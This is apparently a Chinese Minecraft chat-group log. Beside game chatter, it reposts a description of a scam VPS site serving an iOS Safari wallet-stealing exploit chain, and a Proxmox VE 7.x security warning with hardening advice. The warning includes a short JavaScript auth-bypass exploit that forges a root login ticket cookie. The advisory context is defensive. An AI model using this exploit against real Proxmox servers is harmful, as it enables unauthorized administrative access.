Jump to...
redirecting...

Log for Minecraft 中文群組 (Chinese only)

好像要下一个网络模块才能收到信息得用小火箭
只开后台刷新是不行的(是不是我这手机是国行版?)
群峦服务器(
2天没上线大家进度也差不多这一块(
落幕曲
ATM 10 S
[photo](media:AgACAgUAAx0CQ69l-wABAdOTapZKo6vKeco2Obk4Jsb2mJs2k4kAAqwRaxvtD7lUexbfmxsGZMQBAAMCAANzAAM9BA@telegram)
是,做到了不用第三方启动器也可以灵活的开关
没怎么玩基岩版,我还寻思好像和官方也没啥区别(
齿轮盛宴
额,真正玩的人有超过10个吗😅
玩不进去了
看看vulkan这个活oj能什么时候能端上来
2026年9月1日,一个名为 "极点云 PolarNode" 的站点 event.polarnode.vip 上线(域名 8 月 31 日注册),以"完成预约,前 5,000 名用户均可获得免费 VPS,最高赠送 3 年使用权"为噱头,在 VPS / 运维 / 区块链相关论坛与社群中通过"邮箱 + 邀请码裂变"方式扩散。该站点无真实 VPS 销售能力、无公司主体、无联系方式、无售后支持,其唯一实质功能是在页面加载后自动注入一段高复杂度混淆的恶意脚本,对访问者的 iOS Safari 浏览器发起完整的远程攻击。

经对落地页、投递脚本 lk.js 及其级联加载的 dist/ 利用链(vendor.js、runtime.js、framework.js、common.js、app.js 等)逐层反混淆与静态取证,确认这是一条针对 iOS 18.6 / 18.6.1 / 18.6.2(build 22G86/G90/G100)全系 26 款机型的浏览器端 RCE 利用链,最终在系统进程内植入窃取模块,定向盗取加密货币钱包(imToken / TronLink / 及通用钱包)、钥匙串(Keychain)、短信、通讯录、相册、备忘录等数据并回传 C2。其偏移表覆盖广度、内核原语完整度与中文开发注释,表明其出自具备成熟 iOS 漏洞利用工程能力的团伙,性质近似商用级间谍软件(Pegasus / Predator 类)的简化分发版。

https://www.nodeseek.com/post-905477-1
#风险预警

本频道从多信源整理, PVE WebUI 近期极有可能已出现严重 RCE 0day 安全漏洞 (并已出现在野利用报告),从 PVE7 (已 EOL, 建议立即更新) 到 PVE8 (已知报告版本: 8.0.3 / 8.2 / 8.4) 全系列均已被攻破,可绕过身份验证。

操作建议:

1) 立即停止将任何 PVE WebUI / WebAPI (8006) / SSH 直接暴露公网;
2) 如一定需要暴露公网,也尽可能利用 VPN (e.g. Tailscale) / SD-WAN / Cloudflare Zero-Trust (One) 为 PVE WebUI 增加二层防护 (或者最简单的: 加个 basic auth);在 sshd config 中也禁止使用密码登录;
3) 哪怕 PVE 仅部署在内网,也请配置好 IP-ACL Rule;
4) PVE <=8 已正式 EOL,无论如何都请更新到 PVE 9;
5) 非常建议 PVE9 也采取以上安全措施建议;
6) 近期在运维时需要投入更多精力关注 PVE 相关补丁更新。

refs: PVE7 report | PVE 8.0.3/8.2/8.4 report
*PVE8 也已经在 8/31 EOL 了

*在官方出正式报告前,即便是最新版也不建议直接暴露公网

我总感觉官方还没修
Update: 由于 PVE 7.x 已 EOL,因此对应版本的 Exploit 已提前发布(确认可完整绕过 WebUI 认证),8.x/9.x 则被作者声明为 “暂时不受影响”

无论如何,尽快参考 最佳实践 加固你所有对外开放的敏感服务!

Exp (.js) 正文:

// PVE 7.4 auth-bypass @NebuSec 2026
// First, make sure to try logging in as root with this exact password: root@pam
(async () => {
    const form = new URLSearchParams({
        username: "root@pam",
        password: "root@pam",
        "tfa-challenge": "NEBUSEC-CHALLENGE",
    });
    const loginResponse = await fetch("/api2/json/access/ticket", {
        method: "POST",
        credentials: "omit",
        headers: { "Content-Type": "application/x-www-form-urlencoded;charset=UTF-8" },
        body: form,
    });
    const loginBody = await loginResponse.json();
    document.cookie = `PVEAuthCookie=${loginBody?.data?.ticket}; Path=/; Secure; SameSite=Strict`;
    location.reload()
})();


观后感:不是,你就这么水灵灵的拿到 login cookie 了?

https://fixupx.com/nebusecurity/status/2094719919539793989
此漏洞已分配编号 PSA-2026-00043-1

确认受影响版本: >= 7.0-7 & <8.0.4 (截止今日均已 EOL), 仍然建议更新到 PVE 9

*如果你在 PVE WebUI 中配置了用户的 TFA,就不受此漏洞影响

https://forum.proxmox.com/threads/proxmox-virtual-environment-security-advisories.149331/page-4#post-867929